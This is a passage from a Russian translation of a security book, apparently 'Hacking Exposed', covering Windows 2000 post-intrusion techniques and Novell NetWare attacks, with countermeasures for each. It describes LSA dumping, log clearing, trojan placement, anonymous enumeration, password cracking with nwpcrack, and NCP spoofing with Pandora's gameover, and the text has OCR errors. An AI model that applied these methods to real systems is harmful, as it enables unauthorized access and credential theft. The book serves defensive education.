панели шифрование файловой системы станет невозможным. На следующем рисунке показано, что происходит при попытке шифрования без агента восстановления — система не работает.
Файлы, зашифрованные до удаления агента восстановления, остаются зашифрованными, но могут быть открыты только соответствующим пользователем или после восстановления агента из резервной копии. Для узлов, входящих в домен, ситуация отличается. Ключи восстановления всех систем, входящих в домен, хранятся на его контроллере. При добавлении к домену компьютера под управлением Win 2000 автоматически вступает в силу используемая по умолчанию политика восстановления домена и агентом восстановления становится администратор домена, а не локальный администратор. Таким образом, ключи восстановления физически отделяются от зашифрованных данных, что значительно затрудняет описанную атаку. Не мешает также экспортировать сертификат агента восстановления с контроллера домена, поскольку при их получении уязвимыми станут все компьютеры данного домена. Компания Microsoft в ответном документе также утверждает, что возможность удаления файла SAM, приводящую к установке пароля администратора в NULL, можно предотвратить с помощью ключа SYSKEY. Но выше было показано, что это не так, если не выбран режим его защиты паролем или хранения на гибком диске (в статье об этом умалчивается). |
Вторжение на доверительную территорию Один из основных приемов взломщиков — поиск данных пользователей домена (а не локальной системы). Это позволяет хакерам получить доступ к контроллеру домена и легко обмануть систему безопасности домена. Такой деятельности обычно невольно способствуют администраторы, которые регистрируются на локальной машине с использованием данных учетной записи домена. Система Win 2000 не может предостеречь своих пользователей от очевидных ошибок. Средства получения данных LSA -живут и здравствуют Как было показано в главе 5, получение данных LSA — основной механизм для вгпома доверительных отношений, поскольку позволяет получить данные о нескольких последних зарегистрированных в системе пользователях и пароли учетных записей служб. С:\>lsadump2
Контрмеры против Isadump2 Компания Microsoft считает, что описанная ситуация не представляет угрозы для безопасности системы, поскольку для запуска утилиты Isadump2 требуется привилегия seoebugprivilege, делегируемая по умолчанию только администраторам. Лучший способ противостояния lsadump2 - защитить учетные записи администраторов. Если же хакер получит доступ к учетной записи администратора, то с помощью lsaduir.P2 он сможет получить и учетные записи служб внешних доменов, и с этим ничего не поделаешь. Новая система множественной репликации и модель доверительных отношений Одним из наиболее значительных отличий Win 2000 от NT в области архитектуры доменов является переход к системе множественной репликации и модели доверительных отношений. В рамках леса Win 2000 все домены хранят реплики совместно используемой службы Active Directory и строят двухсторонние доверительные отношения друг с другом по транзитивному принципу на базе протокола Kerberos (доверительные отношения между лесами доменов или с доменами нижнего уровня NT 4 по-прежнему остаются односторонними). Это приводит к интересным следствиям при разработке топологии доменов. |
Сокрытие следов В Win 2000 применяются в основном те же средства и приемы сокрытия следов, что и в более ранних версиях операционной системы с небольшими отличиями. Приведем их краткое описание. |
Отключение аудита Для включения аудита можно воспользоваться аплетом Local Security Policy (secpol.msc) или Group Policy (gpedit.msc), выбрав на левой панели управляющей консоли элемент Local Policy^Audit Policy или Computer Configuration>Windows SettingsoSecurity Settings>Local Policy>Audit Policy соответственно. Политика групп будет рассмотрена ниже в этой главе. Параметры аудита в Win 2000 в основном совпадают с параметрами NT 4. |
Очистка журнала регистрации событий В Win 2000 по-прежнему возможна очистка журнала регистрации событий, однако доступ к журналам осуществляется посредством нового интерфейса. Просмотреть различные журналы событий теперь можно через управляющую консоль Computer Management с помощью элемента System ToolsЮ Event Viewer. Появилось три новых журнала: Directory Service, DNS Server и File Replication Service. При щелчке правой кнопкой на одном из них открывается контекстное меню, содержащее команду Clear All Events. |
Сокрытие файлов Одной из главных задач хакера после удачного вторжения в систему является надежное сокрытие своего инструментария. В главе 5 обсуждались два способа сокрытия файлов: с помощью команды attrib и файловых потоков. Команда attrib Для сокрытия файлов по-прежнему можно применять команду attrib, но при этом файлы все же останутся видимыми при выборе опции Show All Files для данной папки. Потоки С помощью утилиты ср из набора NTRK (поддерживающей стандарт POSIX) можно скрыть файлы за другими файлами в потоках (см. главу 5). Эту утилиту можно использовать и в Win 2000 даже при переходе на новую версию 5 файловой системы NTFS. |
Потайные ходы Последним пунктом программы хакеров является обеспечение возможности повторного проникновения в систему, усыпив бдительность системных администраторов. |
Манипуляции в процессе запуска системы Как упоминалось в главе 5, излюбленный прием хакеров — оставить в системе свои исполняемые файлы, которые будут автоматически запускаться при загрузке системы. Такие возможности по-прежнему имеются в системе Win 2000. Поэтому необходимо проверять соответствующие папки взломанной системы на наличие неизвестных или странных команд.
В Win 2000 отличается лишь местоположение папки автозагрузки Startup для каждого пользователя. Теперь эта папка находится в папке Documents and Settings (%systemdrive%\ Documents and Settings\%user%\Start Menu\Programs\Startup). Прикрепление к исполняемым файлам Иногда наиболее очевидные потайные ходы сложнее всего разглядеть. Например, можно просто разместить троянскую оболочку Windows под именем explorer.exe в корне каталога %systemdrive% целевой системы (по умолчанию право записи в этот каталог имеют все пользователи). Тогда при интерактивной регистрации пользователя эта профамма по умолчанию будет использоваться в качестве оболочки для этого пользователя. Почему это происходит? Выявление всех относительных путей в реестре Эта проблема была устранена в модуле обновления MS00-052, не включенном в состав сервисного пакета SP1, поэтому этот модуль необходимо применять независимо от установки сервисного пакета. И хотя в разделе часто задаваемых вопросов компания Microsoft заявляет об отсутствии этой угрозы (http://www.microsoft.com/technet/ security/bulletin/fq00-052.asp), Альберто Арагонес (Alberto Aragones) приводит примеры других исполняемых файлов (например, rundll32.exe), для которых пути в реестре явно не указаны. Действительно, имя этого файла многократно встречается в реестре без указания абсолютного пути. Возникает вопрос, как вернуть систему в нормальное состояние, если с ней уже сыграли злую шутку, описанную Альберто? На этот случай Альберто советует запустить программу %windir%\explorer.exe из командной оболочки, а затем удалить "поддельный" проводник, или просто ввести команду геп\ explorer.exe harmless.txt, а затем перезагрузить компьютер с помощью комбинации клавиш <Alt+Ctrl+Del>. |
Удаленное управление Все описанные в главе 5 механизмы удаленного управления по-прежнему работают в новой версии операционной системы. Утилита remote из набора NTRK теперь входит в состав средств поддержки Win 2000 Support Tools (как и многие другие базовые утилиты NTRK). Обновленная версия этой утилиты называется wsremote, но ее функциональность в целом сохранилась. Средства NetBus и WinVNC не претерпели никаких изменений. В Win 2000 может работать и утилита Back Orifice 2000 (ВО2К), поэтому особо беспечным администраторам, которые потешались над возможностью работы исходной версии ВО только в среде Win 9.v, теперь будет не до шуток. Терминальный сервер Значительным новшеством Win 2000 является включение терминальных служб в состав базовых серверных продуктов. Дополнительно устанавливаемый терминальный сервер превращает Win 2000 в абсолютно новую систему, позволяющую выполнять клиентские процессы на центральном процессоре сервера. Во всех предыдущих версиях Windows, за исключением отдельного продукта NT Terminal Server Edition, все клиентские программы всегда выполнялись процессором клиента. Для пользователей операционной системы UNIX и больших машин такой подход не нов, однако администраторам NT/2000, безусловно, понадобится некоторое время, чтобы научиться отличать удаленные интерактивные сеансы от сеансов работы в режиме консоли. Выявление отключенных соединений с терминальным сервером Что может сделать взломщик, имея привилегии администратора на терминальном сервере? Если на момент подключения хакера с данными учетной записи Administrator последний представитель из группы администраторов забыл завершить терминальный сеанс (или несколько сеансов), то взломщик получит следующее информационное сообщение. Выбрав один из открытых сеансов, хакер может получить доступ к конфиденциальным документам или другим секретным данным, а также автоматически получить доступ к работающим приложениям, которые в другое время ему пришлось бы запускать вручную. Завершение терминальных сеансов Если просто закрыть окно клиента терминального сеанса или щелкнуть на кнопке Disconnect, сеанс останется активным. Для завершения терминального сеанса необходимо выбрать соответствующую опцию при выполнении команды Start^Shutdown или воспользоваться комбинацией клавиш <Ctrl+Alt+End> в режиме работы клиента терминального сервера. Приведем список других клавиатурных эквивалентов команд, доступных в режиме работы клиента терминального сервера. Во время подготовки этой книги к печати по адресу http://marvin.criad vcmtage.com/caspian/Software/SSHD-NT/default.php ПОЯВИЛСЯ набор бесплатных утилит Linux для DOS SSHD-NT. Утилиты SSH (Secure Shell) в течение многих лет обеспечивают безопасность удаленного управления UNIX-системами, поэтому на них возлагаются большие надежды и в области удаленного управления Win 2000. Предполагается, что набор SSHD-NT составит достойную альтернативу терминальному серверу в смысле безопасного удаленного управления из командной строки. Более подробная информация по SSH содержится в разделе часто задаваемых вопросов по Secure Shell по адресу http://www.employees.org/~satch/ssh/faq/ssh-faq.html. |
Регистраторы нажатия клавиш В Win 2000 по-прежнему хорошо работают программы, регистрирующие нажатия клавиш, NetBus и Invisible Key Logger Stealth (IKS), описанные в главе 5. |
Контрмеры общего назначения: новые средства обеспечения безопасности Windows В Win 2000 включены новые средства обеспечения безопасности. Теперь этот аспект гораздо лучше систематизирован, чем в NT 4. Эти утилиты позволяют жестко настроить защиту системы во имя избежания возможных брешей в защите. |
Политика групп Одним из наиболее мощных новых средств в Win 2000 является политика групп, которая уже несколько раз упоминалась в этой главе. Объекты политики групп могут храниться как в активном каталоге, так и на локальной машине, и определять параметры конфигурации в масштабах домена или одного компьютера соответственно. Политику групп можно применять к узлам, доменам или организационным единицам. Параметры политики наследуются пользователями или компьютерами, входящим в состав этих единиц ("участниками" группы). Объекты политики групп обеспечивают один из способов защиты больших доменов Win 2000. Однако зачастую политика уровня домена может входить в противоречие с локальной политикой. Кроме того, губительный результат может иметь задержка, возникающая до вступления в силу политики групп. Такую задержку можно устранить, например, с помощью утилиты secedit (эта утилита более подробно обсуждается в следующем разделе), выполняющей немедленное обновление политики. Для обновления политики с помощью утилиты secedit откройте диалоговое окно Run и введите команду secedit /refreshpolicy MACHINE_POLICY
Средства настройки безопасности Для настройки политики групп можно воспользоваться набором утилит для настройки безопасности, в состав которого входят две программы: Security Configuration and Analysis и Security Templates. Команда runas К радости поклонников операционной системы UNIX в состав Win 2000 включена собственная команда переключения привилегий пользователей runas (аналог su). Команда Run as теперь доступна через контекстное меню. |
Резюме В этой главе мы лишь слегка коснулись многочисленных изменений, относящихся к Win 2000, однако проверка программ взлома для NT 4 показала существенное повышение безопасности в новой версии операционной системы. Вселяет оптимизм также добавление распределенной политики безопасности в Win 2000. Однако окончательные выводы о защищенности этой операционной системы можно будет сделать только в процессе ее широкого использования. Для полного выявления всех брешей системы NT 4 понадобилось несколько лет. Примерно столько же времени потребуется и для досконального изучения Win 2000. Приведем несколько советов, основанных на материале этой главы, главы 5, а также материалах многочисленных ресурсов Internet по безопасности Win 2000.
|
Глава 7. УЯЗВИМОСТЬ NOVELL NETWARE
|
Уязвимость NOVELL NETWARE Стандартным заблуждением относительно компании Novell является то, что ее программные продукты несколько устарели и утратили актуальность (по крайней мере в этом нас стараются убедить сообщества Microsoft и UNIX). Несмотря на отсутствие настойчивой рекламы, а также на то, что в последние годы рынок программного обеспечения компании Novell не расширялся, до ее забвения все же еще очень далеко. Во всем мире имеется более сорока миллионов пользователей NetWare, и риск потери важных корпоративных данных чрезвычайно высок. В этой книге будут рассматриваться различные версии NetWare, однако основное внимание мы уделим системе NetWare 4.x с клиентом Client32 — наиболее популярной в настоящее время. Однако если вы приобрели NetWare 5, не расслабляйтесь: многие из описываемых в данной главе атак, а также контрмеры против них по-прежнему актуальны. |
Соединение без регистрации Первым шагом взломщика является создание анонимного соединения (attachment) с сервером Novell. Для того чтобы разобраться с понятием "соединения", нужно понять, что происходит в процессе регистрации NetWare. Процесс регистрации на сервере NetWare реализован компанией Novell следующим образом. До аутентификации сервером к нему необходимо сначала присоединиться. Соединение и регистрация не являются взаимозаменяемыми. Другими словами, если регистрация завершилась неудачно, то соединение будет сохранено. Так что для соединения нет необходимости использовать корректное имя пользователя и пароль. Как вы скоро узнаете, присоединившись к компьютеру с системой NetWare, взломщик может сразу же приступать к своему черному делу. On-Site Admin В набор средств обеспечения безопасности администратор должен включить утилиту On-Site Admin. Она представляет собой средство администрирования NetWare с графическим интерфейсом, разработанное компанией Novell. Утилита On-Site Admin предоставляет информацию о серверах и деревьях, а также практически исчерпывающие данные, позволяющие оценить состояние системы защиты. При разработке этого приложения разработчики Novell приняли разумное решение, однако его можно использовать и против вас. Достаточно забавно, что теперь приложение On-Site Admin является одним из основных средств хакинга Novell. snlist и nslist Утилиты snlist и nslist позволяют создать соединение с сервером точно так же, как и приложение On-Site Admin, только из командной строки. Утилита snlist работает быстрее nslist и хорошо подходит для наших целей, однако nslist оказывается не менее полезной, поскольку позволяет получить полный адрес сервера. Обе программы можно использовать без параметров, чтобы присоединиться ко всем серверам локальной сети. Такой способ соединения создает предпосылки для того, чтобы в полной мере "вкусить прелести" хакинга. Если у вас возникли проблемы соединения с серверами Novell, проверьте наличие основного сервера. Для этого откройте диалоговое окно NetWare Connections и убедитесь в том, что в нем имеется сервер, перед именем которого указан символ *. Перед выполнением этих операций необходимо, чтобы существовал как минимум один присоединенный сервер. Если после этого проблема не исчезла, выделите другой сервер и щелкните на кнопке Set Primary. При использовании утилит командной строки необходимо запустить новый сеанс командной строки (cmd.exe для NT или command. com для Win 9x). В противном случае возникнет много ошибок и потребуется потратить много времени на их устранение.
Контрмеры против соединения Нам неизвестно ни одного механизма, с помощью которого можно отключить возможность соединения с сервером NetWare. В настоящее время этот вопрос остается нерешенным, в том числе и в NetWare 5. |
Инвентаризация связки и деревьев В состоянии "зомби", когда установлено соединение без регистрации, можно получить огромное количество информации, гораздо больше, чем можно себе представить. Такие средства, как userinfo, userdump, finger, bindery, bindin, nlist и сх, позволяют получить данные о связке. Приложения, подобные On-Site Admin, предоставляют информацию о дереве NDS. Все вместе эти утилиты обеспечивают взломщика большими знаниями, которые позволят ему получить доступ к серверам. Помните о том, что вся необходимая информация доступна через единственное соединение с сервером Novell. userinfo Мы используем утилиту userinfo версии 1.04, которая изначально называлась NetWare User Information Listing. Написанная Тимом Швабом (Tim Schwab), утилита позволяет быстро получить дамп всех пользователей, содержащихся в структуре связки сервера. Утилита userinfo позволяет также осуществлять поиск по одному имени пользователя. Для этого достаточно указать его в качестве параметра. Как видно из следующего рисунка, присоединившись к серверу SECRET и запустив утилиту userinfo, можно извлечь имена всех пользователей системы, включая идентификатор каждого пользовательского объекта (object JD).
userdump Утилита userdump версии 1.3 Роя Коуша (Roy Coates) аналогична userinfo в том, что отображает все пользовательские имена на присоединенном сервере, однако в то же время она предоставляет и полные имена, как видно из следующего рисунка. Эта информация может пригодиться взломщикам для выполнения задач социальной инженерии. Например, можно позвонить в отдел технической поддержки компании и попросить обнулить пароль пользователя, имя которого стало известно.
finger Для инвентаризации пользователей системы нет необходимости использовать утилиту finger. Однако мы включили ее в этот раздел, поскольку она оказывается полезной, когда требуется определить, существует ли в системе определенный пользователь. Например, взломщик мог проникнуть на компьютер под управлением системы NT или UNIX и получить несколько имен пользователей и паролей. Кроме того, ему известно, что (а) пользователи зачастую имеют учетные записи на других узлах и (б) для простоты они пользуются одним и тем же паролем. Следовательно, полученными пользовательскими именами и паролями взломщик может воспользоваться для проникновения в другие системы, например серверы Novell. Для поиска пользователей в системе просто введите команду finger <имя-пользователя>. bindery Выявить пользователей, имеющихся на сервере, очень важно. Однако для того чтобы предпринять попытку проникновения, взломщику необходимо иметь в своем распоряжении немного больше информации. Например, кто из пользователей принадлежит к группе администраторов9 Программа NetWare Bindery Listing версии 1.16, разработанная компанией Manth-Brownell, Inc., предоставляет информацию практически о любом объекте связки (bindery object) (рис. 7.1). Программа bindery позволяет также отправить запрос об одном пользователе или группе. Например, просто введите команду bindery admins, чтобы получить список членов группы Admins. Параметр /В пригодится при одновременном просмотре большого количества объектов, поскольку в этом случае вывод информации будет выполняться по одной строке для каждого объекта.
bindin Как и программа bindery, bindin позволяет просмотреть различные объекты, такие как серверы, пользователи и группы, однако имеет более организованный интерфейс. Как и bindery, утилита bindin позволяет извлечь и данные о членстве в группах. Так что с ее помощью можно получить список пользователей из наиболее важных групп, таких как MIS, IT, ADMINS, GENERALADMINS, LOCALADMINS И Т.Д.
nlist Утилита nlist содержится в папке SYS: PUBLIC системы NetWare и заменяет утилиту NetWare З.д: si 1st, позволяющую просматривать все серверы сети NetWare. В то же время утилита nlist предоставляет гораздо более широкие возможности, а именно позволяет просматривать данные о пользователях (user), группах (group), серверах (server), очередях (queue) и томах (volume). В основном она служит для получения перечня пользователей на сервере Novel и групп, к которым они принадлежат.
Утилиту nlist особенно полезно использовать для получения свойств объекта, таких как должность (title), фамилия (surname), номер телефона (phone number) и др. СХ Небольшая утилита Change Context (сх) при каждой установке системы NetWare 4.x помещается в папку SYS: PUBLIC. Она отображает информацию о дереве NDS или о его небольшой части. Эта утилита оказывается чрезвычайно полезной при поиске определенных объектов внутри дерева. Например, если на определенном сервере взломщик узнал пароль пользователя ECULP, то с помощью утилиты сх можно выполнить поиск во всем дереве NDS других серверов, которые способны аутентифицировать данного пользователя. Вот несколько примеров использования утилиты сх.
Если при использовании команд сх у вас возникают проблемы (например, генерируются такие ошибки, как сх-4 .20-240), то в дальнейшем лучше прибегнуть к утилите просмотра дерева On-Site, которая подробно рассматривается ниже в данной главе. Подобная проблема иногда возникает при удаленных соединениях с сетью. При этом генерируются такие ошибки, как СХ-4.20-240: The context you want to change to does not exist.
On-Site Administrator Как вы узнали из главы 3, по умолчанию система NetWare разрешает просматривать все дерево NDS любому пользователю. Данные, полученные в результате просмотра дерева, могут оказаться чрезвычайно полезными для взломщика, поскольку графически отображают каждый объект дерева, включая контейнеры, серверы, пользователей, группы, принтеры и т.д.
Контрмеры против инвентаризации Защититься от прав просмотра [PUBLIC] объекта [ROOT] , устанавливаемого в системе NetWare 4.x по умолчанию, можно двумя способами. Наши рекомендации можно найти в главе 3. |
Поиск "незакрытых" дверей После того как взломщики составили представление о самом "здании" (пользователях и серверах), можно перейти к подбору ключей к дверным замкам (подбору паролей). Наиболее вероятно, что для решения этой задачи взломщики попробуют зарегистрироваться. Сейчас в их распоряжении имеются все имена пользователей. Осталось лишь узнать несколько паролей. chknull Для взломщика (и администратора) чрезвычайно важное значение имеют несколько утилит системы NetWare, в частности chknull. Эта утилита имеется на серверах NetWare 3.x и 4.x, на которых установлен контекст связки. Она оказывается абсолютно бесценной как для взломщиков, так и для администратора, и позволяет выполнять поиск пустых или легко подбираемых паролей. Не забывайте о том, что при создании новой учетной записи система NetWare не требует задания пароля (если не используется соответствующий шаблон). В результате многие пользовательские учетные записи создаются с нулевыми паролями, оставляя тем самым "широко распахнутые двери" на многие серверы Novell. Эту проблему усложняет еще то обстоятельство, что для многих пользователей простота важнее обеспечения безопасности. В результате подавляющее большинство пользователей применяют легко запоминающиеся пароли (что зачастую приводит к нарушению политики обеспечения безопасности). Usage: chknull [-p] [-n] [-v] [wordlist .,.] Примечательной особенностью поиска нулевых паролей является то, что при каждой попытке запись о неудачной попытке регистрации не создается. Последний параметр утилиты chknull (поддерживающий поиск паролей по словам, заданным в командной строке) работает не всегда, так что не стоит возлагать на него большие надежды. Если в процессе инвентаризации сервера возникли проблемы с использованием утилиты chknull, проверьте наличие основного сервера (его можно задать, щелкнув на кнопке Set Primary). Сделать это можно в диалоговом окне NetWare Connections.
Контрмеры против использования chknull Защититься от утилиты chknull очень просто. Однако в зависимости от конкретной ситуации все же могут возникнуть различные трудности. Любая из следующих рекомендаций позволит воспрепятствовать успешному применению утилиты chknull.
1. Выберите команду Details. |
Инвентаризация после аутентификации Теперь понятно, как много информации предоставляют серверы NetWare. Вас это еще не испугало? Прекрасно, после аутентификации взломщики смогут получить еще больше данных. userlist /a Утилиту userlist нельзя использовать просто после соединения с сервером, так что предварительно нужно узнать корректное имя пользователя и пароль (с помощью chknull). Она предоставляет те же возможности, что и программа On-Site, однако используется в командной строке, что позволяет применять ее в сценариях (см. рисунок ниже). Утилита userlist предоставляет взломщику важную информацию, включая полный адрес сети и узла, а также время регистрации. On-Site Admin После аутентификации на сервере NetWare можно снова воспользоваться программой On-Site, уже для просмотра всех текущих соединений с сервером. Просто выберите с помощью мыши требуемый сервер, а затем щелкните на кнопке Analyze. В результате будет получена основная информация не только о томе, но и обо всех текущих соединениях (рис. 7.4).
NDSsnoop В различных ситуациях программа NDSsnoop может принести различную пользу. Однако если вы сможете ею воспользоваться, то это окажется чрезвычайно полезным. После успешного прохождения аутентификации программу NDSsnoop можно применять для просмотра в графическом режиме подробных данных обо всех объектах и свойствах (подобно утилите nlist /ot = * /dyn /d, рассмотренной выше), включая свойство Equivalent To Me. Проверка активности режима блокировки вторжений Этот режим является встроенной возможностью системы NetWare. При его включении учетная запись пользователя будет заблокирована после заданного числа неудачных попыток регистрации. К сожалению, по умолчанию режим блокировки вторжений (intruder lockout) отключен. Этот режим должен быть всегда включен. Его очень важно использовать для отражения атак взломщиков, направленных на получение доступа к серверу. После установки соответствующего флажка (рис. 7.6) убедитесь, что требуемые изменения внесены и в свойства каждого контейнера дерева.
Как только взломщик приготовился атаковать определенного пользователя, обычно он предпринимает попытку определить, включен ли режим блокировки вторжений. Если да, то потребуется быть гораздо более осторожным. Вы будете удивлены, как много администраторов пренебрегают этой возможностью. Возможно, это происходит из-за недостатка знаний, недостаточного понимания важности использования этого режима или просто из-за слишком большой нагрузки по администрированию. Вот описание методологии, зачастую применяемой для определения состояния режима блокировки вторжений. И на системной консоли появится следующее сообщение. 4-08-99 4:29:28 pm: DS-5.73-32 После около двадцати неудачных попыток регистрации без получения сообщения login failure status с достаточной степенью вероятности можно сказать, что режим блокировки вторжений на исследуемом сервере отключен. Контрмеры против проверки активности режима блокировки вторжений Мы не знаем способов, с помощью которых можно обнаружить взломщиков, пытающихся проверить, включен ли режим блокировки вторжений. Насколько нам известно, подавить отображение подобных сообщений в системе NetWare нельзя. Лучше всего проявлять настойчивость и постоянно следить за сообщениями на консоли сервера. Кроме того, отслеживайте до конца все случаи подозрительной блокировки независимо от того, насколько важным это может показаться. |
Получение привилегий администратора Как было продемонстрировано выше, в большинстве случаев получить доступ на уровне пользователей очень просто. Для этого достаточно воспользоваться утилитой chknull, чтобы обнаружить пользователей без паролей, либо прибегнуть к их подбору. Следующим шагом большинства взломщиков будет получение прав администратора на сервере или дереве. Для решения этой задачи существует два основных метода:
Несанкционированное получение данных На этой стадии многие злонамеренные взломщики будут предпринимать попытки несанкционированного получения данных. Другими словами, они будут пытаться зарегистрироваться везде, где это возможно, и найти доверчивых пользователей, хранящих пароли в незашифрованном виде. Такой подход способен принести гораздо больше выгоды, чем это может показаться на первый взгляд.
He забывайте о том, что пользователь, с помощью учетной записи которого вы зарегистрировались, может и не иметь доступа ко всем этим каталогам. Однако вы можете оказаться счастливчиком. Каталоги SYSTEM и ETC особенно важны, поскольку в них содержатся жизненно важные конфигурационные файлы сервера. Их может просмотреть лишь пользователь с правами администратора. Контрмеры против несанкционированного получения данных Контрмеры, позволяющие предотвратить попытки взломщика несанкционированно получить данные на томах NetWare просты и очевидны. Оба совета предполагают ограничение прав пользователей.
nwpcrack Утилита nwpcrack представляет собой средство взлома паролей систем NetWare 4.x С ее помощью можно взломать пароль определенного пользователя с использованием словаря. В приведенном примере была обнаружена группа администраторов. После регистрации в качестве пользователя появляется возможность увидеть пользователей, имеющих права, эквивалентные администраторам, или просто тех из них, кто является членом группы администраторов, MIS и т.д. Проделав это, в группе администраторов были обнаружены пользователи DEOANE и JSYMOENS. Именно с них и стоит начать атаку.
Не пытайтесь применять утилиту nwpcrack к учетным записям администраторов, если включен режим блокировки вторжений. В противном случае может быть заблокирована учетная запись за пределами дерева. Перед тестированием с помощью утилиты nwpcrack учетной записи ADMIN (или эквивалентной) нужно создать ее резервную копию. В системе Windows NT не может возникнуть подобного состояния DoS, поскольку в ней нельзя заблокировать исходную учетную запись администратора, если не используется дополнительная утилита из набора NTRK, passprop. Если с помощью утилиты nwpcrack будет обнаружен активный режим выявления вторжений, то вы получите сообщение tried password«password» с тем же паролем, выведенным повторно. Это будет свидетельствовать о том, что сервер NetWare больше не будет принимать запросы на регистрацию от этого пользователя. Тогда нужно нажать комбинацию клавиш <Ctrl+C>, чтобы выйти из программы, поскольку в противном случае на консоли сервера появится хорошо знакомое сообщение DS-5.73-32: intruder lock-out on account Admin ("Блокирование вторжения для учетной записи Admin"). А это совсем не входит в планы взломщика.
Контрмеры: защита от утилиты nwpcrack Защититься от подбора пароля пользователей (скорее всего, администраторов) с помощью утилиты nwpcrack очень просто. Вот некоторые рекомендации.
|
Изъяны приложений В терминах служб TCP/IP после установки системы NetWare по умолчанию используется лишь несколько открытых портов, включая Echo (7) и Chargen (19) — не очень много для потенциальных атак (за исключением очевидной генерации состояния отказа в обслуживании, DoS). Однако при добавлении служб Web, FTP, NFS и telnet появляются новые открытые порты, такие как 53, 80, 111, 888, 893, 895, 897, 1031 и 8002. Сценарии Perl в системе NetWare Первоначально проблема была обнаружена в начале 1997 года, так что если вы используете более ранние версии системы NetWare 4.x или IntraNetWare, то потери защищенности может и не возникнуть. Однако суть проблемы заключается в том, что взломщик может выполнять сценарии Perl из любого места тома, включая рабочие каталоги пользователей и системные каталоги, такие как LOGIN и MAIL. Контрмеры: защита от сценариев Perl К сожалению, предлагаемая контрмера далеко не идеальна и заключается в том, чтобы либо полностью отказаться от использования службы, либо обновить ее до новой версии. Другими словами, выполните одно из следующих действий.
или
Служба FTP системы NetWare Этот изъян средств поддержки FTP присутствует лишь в исходной FTP-службе IntraNetWare. Конфигурационные параметры, используемые по умолчанию, разрешают анонимным пользователям доступ File Scan к каталогу SYS:ETC. В этом каталоге содержится файл netinfo.cfg (и другие важные конфигурационные файлы). Контрмеры: защита службы FTP Принципы зашиты службы FTP системы NetWare аналогичны контрмерам против использования сценариев Perl. Необходимо либо запретить использование службы либо обновить программное обеспечение.
Версия ftpserv.nlm для системы NetWare 4.11 по умолчанию запрещает анонимный доступ пользователей. Web-сервер NetWare Об уязвимости Web-сервера системы NetWare стало известно в 1996 году. Более ранние версии Web-сервера системы NetWare 4.x не способны проверять параметры, передаваемые его файлу convert.bas сценариями на языке Basic. В результате взломщики могут без проблем увидеть любой файл системы, включая autoexec.ncf, Idremote.ncf и netinfo.cfg. Для проверки степени уязвимости вашего сервера выполните следующие действия. Контрмеры: защита Web-сервера NetWare Выполните обновление до самой последней версии Web-сервера компании Novell, обратившись по адресу http://www.support.novell.com, или как минимум до версии 2.51R1, Компанией Novell были исправлены сценарии Basic, содержащиеся в каталоге SCRIPTS. Теперь с их помощью можцо открыть лишь определенные файлы, перечень которых жестко ограничен. |
Ложные атаки (PANDORA) Если все предыдущие попытки получения привилегий администратора закончились неудачей, то можно прибегнуть к нескольким ложным атакам с применением пакетов NCP. Средства для осуществления таких атак разработаны в центре исследований NMRC (Nomad Mobile Research Center, http://www.nmrc.org) и называются Pandora (http://www.nmrc.org/pandora/download.html). В настоящее время доступна версия 4.0, однако в данной книге рассматриваются возможности версии 3.0. Для работы пакета Pandora необходимо выполнение нескольких обязательных условий.
gameover Одного имени утилиты gameover вполне достаточно, чтобы узнать, для чего она предназначена. Утилита gameover позволяет взломщику предоставить пользователю привилегии, эквивалентные администратору. Это достигается с помощью передачи серверу 4.x ложного NCP-запроса, в результате чего им будет обработан запрос SET EQUIVALENT TO.
Запустите утилиту gameover следующим образом. Gameover<cr> После этого можно зарегистрироваться в качестве пользователя ECULP и получить права администратора. Здорово, не правда ли? Контрмеры: защита от утилит Pandora Для защиты от утилит из пакета Pandora существует много различных способов, и их перечень во многом зависит от архитектуры узла NetWare. Вообще, для предотвращения хакинга с применением описанных средств нужно следовать следующим рекомендациям:
|
Получив права администратора на сервере... С этого момента самая тяжелая часть работы взломщика осталась позади. Теперь в его распоряжении права администратора сервера и, скорее всего, значительная часть дерева. Следующим шагом является получение доступа к утилите rconsole сервера и сбор файлов NDS. Хакинг утилиты rconsole Получить пароль к утилите rconsole можно несколькими способами, однако на самом деле существует лишь один простой путь, который зависит от степени медлительности администратора. По умолчанию пароль к утилите rconsole хранится в виде незашифрованного текста. Это можно проверить следующим образом.
Контрмеры против использования незашифрованных паролей утилиты rconsole Предотвратить такую опасность очень просто. Компания Novell предлагает механизм шифрования пароля утилиты rconsole с помощью команды remote encrypt. Вот что для этого необходимо сделать. В настоящее время не существует модулей обновления, позволяющих защититься от декодирования зашифрованных паролей утилиты rconsole (а ля Разрушитель!). Для получения самой свежей информации по этому вопросу регулярно обращайтесь ПО адресу http://oliver.efri.hr/~crv/security/bugs/ |
Получение доступа к файлам NDS После приобретения пароля утилиты rconsole осталось выполнить завершающий шаг — получить доступ к файлам NDS. В системе NetWare файлы NDS содержатся в скрытом каталоге _netware тома SYS. Доступ к этому каталогу можно получить лишь через доступ к консоли (для взломщика — утилите rconsole). Для "захвата" файлов NDS существует много методов. И как вы скоро убедитесь, у каждого взломщика имеются свои любимые приемы. netbasic. nlm (SYS: SYSTEM) Набор средств разработки программного обеспечения NetBasic представляет собой язык сценариев, который изначально был разработан компанией High Technology Software Corp. (для краткости HiTecSoft). С его помощью можно конвертировать сценарии NetBasic в формат NLM (NetWare Loadable Module) компании Novell и использовать их на Web-сервере системы NetWare. Компонент netbasic.nlm имеет уникальную особенность, которая изначально была обнаружена взломщиками: с его помощью из командной строки можно про смотреть весь том, включая скрытый каталог _netware. dsmaint Может оказаться, что на целевом сервере язык сценариев NetBasic не установлен. В этом случае придется воспользоваться альтернативным средством — dsmaint. Этот модуль NLM не является стандартным компонентом NetWare 4.11, однако его можно загрузить с Web-узла компании Novell http://www. support.novell.com. Файл называется DS411P.EXE. Однако будьте осторожны: при использовании компонента dsmaint работа службы каталога будет автоматически завершена, так что не стоит использовать его в рабочее время. Для того чтобы вернуться к исходному состоянию службы каталогов, необходимо запустить процесс восстановления. Другими словами, эти действия лучше не выполнять на рабочем сервере. jcmd За последние шесть лет компания JRB Software Limited разработала прекрасные утилиты для системы NetWare, многие из которых можно применять для аудита ее системы безопасности. Однако в отличие от сценариев NetBasic, утилита jcmd не позволяет скопировать открытые файлы NDS. Так что, как и модуль dsmaint.nlm, ее не рекомендуется устанавливать на рабочем сервере. Для обхода этого ограничения необходимо выгрузить службу каталогов. Чтобы скопировать файлы NDS с помощью утилиты jcmd, выполните следующие действия. 8. dir *.* (для того чтобы с помощью модуля jcmd увидеть имена файлов, нужно использовать символы шаблона) Контрмеры против "захвата" файлов NDS Меры защиты против "захвата" данных NDS сводятся к уменьшению количества средств, которые могут быть для этого использованы. Взлом файлов NDS Как только взломщики 